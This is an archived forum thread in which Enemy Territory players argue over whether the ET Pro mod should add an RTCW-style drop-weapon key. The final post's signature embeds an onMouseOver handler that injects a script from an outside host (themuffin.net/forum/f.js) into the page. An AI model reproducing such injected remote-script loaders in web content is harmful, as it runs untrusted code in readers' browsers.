a request for ET Pro or Bayonet.

Discussion for Bani's Pub mod

Moderators: Forum moderators, developers

sneaky1

a request for ET Pro or Bayonet.

Post by sneaky1 »

Currently the only way to drop weapons is to stand over them and switch. At time you can't do it, switch happens to slow and in the end, you die.

How about modifying the way you can drop weapons - like in RTCW. You hit the X key and throw your weapon down so you can pick up a new one later.
Success is only gained through failure.
Come check out the new bani league at:
http://www.bani-league.com
=FF=im2good4u

Post by =FF=im2good4u »

wut use is trowhing oyur gun down if you pick up later you might aswell stivk whit it incase you find oyur self a leut
sneaky1

Post by sneaky1 »

but by the time you find yourself a FO that has ammo, you might be dead. And chances are is that you will find another gun w/ ammo in it near by. This way you dont have to be almost 100 percent dependent on the FO who might not have any ammo for you.
=FF=im2good4u

Post by =FF=im2good4u »

wel if ya find a gun just press +activate
Majikthise

Post by Majikthise »

It's much faster and efficent to drop your weapon that you know you aren't going to be using anymore, then running over another one later.
=FF=im2good4u

Post by =FF=im2good4u »

well maybe or oyu could give oyu remaining ammo to your mates
Spark2

Post by Spark2 »

Please not in ET Pro, it would change the gameplay too much IMO.
Sure it might be faster to drop your weapon, but I like the current solution because it's clean and simple and you don't need another key for this.
SunStyle

Post by SunStyle »

I like the current way of having to pickup a weapon (make it more skilled), but on rtcw alot of people used the dropweapon command to cancel the panzer shot. In et you have to use the lean weapon and sometimes it dosn't cancel. Maybe putting in a key to stop shot.. or switching to another weapon b4 shot goes off (this used to also cancel panzer shot in rtcw) would be a nice addition.
bani
Site Admin

Post by bani »

you arent supposed to be able to cancel a shot at all. be glad lean still works for that 8)
sneaky1

Post by sneaky1 »

Spark2 wrote:Please not in ET Pro, it would change the gameplay too much IMO.
Sure it might be faster to drop your weapon, but I like the current solution because it's clean and simple and you don't need another key for this.
If you play RTCW, moreover, OC Bani Objective 8) , then the additional key for "drop weapon" isnt much a hassle at all because your already used to it. Besides that it wouldnt be much of an addition because bani, in all his great wisdom, has integrated the +activate with shove. BTW, how would it "change gameplay too much"?? It wouldnt really change the way the game is played because medics still wouldn't be able to pick up a panzer, FO's wouldn't be able to pick up mausers or K43's and so on. It will only allow for faster weapon drops which would come in real handy when your trying to defend against a heavy rush of offense.
Spark2

Post by Spark2 »

It would change the gameplay because it would force pretty much everyone to bind a key for this minor action, because it's faster than "activating" a new weapon. I wouldn't like that at all and changing between the two methods for normal/etpro would be even more horrible.
blaz

Post by blaz »

Spark2 wrote:It would change the gameplay because it would force pretty much everyone to bind a key for this minor action, because it's faster than "activating" a new weapon. I wouldn't like that at all and changing between the two methods for normal/etpro would be even more horrible.
are you stupid?

just because +dropweapon would be added doesn't mean +activate would not still be used. therefore, your argument of changing between the two is void.

+dropweapon is a minor action?

it's not to any heavy weapons soldier. in rtcw, when i'm a panzer soldier, i drop my panzer when i spawn to move quicker, i drop it to cancel a shot, and i drop it after i fire. if i was a soldier with the mg42, i'd drop it at spawn and drop it to get the hell out of the way when someone calls an artillery strike near my position.

it's not to anyone who prefers using the enemies gun. whether it be axis or allies, if you're a decent shot, there will be plenty of their guns laying around. moreover, i've had issues with trying to "activate" a new gun. i don't know if those issues were fixed with the new patch or with the tourney mod(s), but i'd prefer to run around with my pistol until i picked up a gun rather than try to activate a new weapon in a gun fight because i ran out of ammo.
Spark2

Post by Spark2 »

:roll: I seriously hope for you that you aren't mature yet. Not sure where you learned that it's a good idea to start a conversation with "are you stupid" though.
Try thinking about my sentence again and you might realize, that I meant to say that it forces everyone to use it who doesn't want to have a disadvantage (you _do_ realize that ET Pro is a competitive mod and not a fun mod?), because dropweapon is simply faster than aiming at the gun and pressing +activate (which never failed on me btw, and I'm doing it all the damn time).
blaz

Post by blaz »

i have yet to see any examples of how it would change gameplay "TOO MUCH IMO."

your only argument is that you would have to make a new bind for it.

oh that's right.. if i was a telepathic, i would know that you MEANT to say if you didn't want to be at a disadvantage, you'd have to make another bind.

go to the config repository. you _DO_ know what that is, don't you? download my config. you'd see i still have dropweapon bound from rtcw.

strafe jumping changes gameplay. everyone who's new to the quake3 engine has to learn how to strafe jump unless they want to be at a disadvantage. i guess they should have removed strafe jumping too, right?

i guess anyone who's never played rtcw is at a disadvantage in et as well. i guess all rtcw players should be banned from playing et.
Rain

Post by Rain »

strafe jumping is a widely-accepted abuse of the physics code, and I wouldn't have missed it if they'd fixed it.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>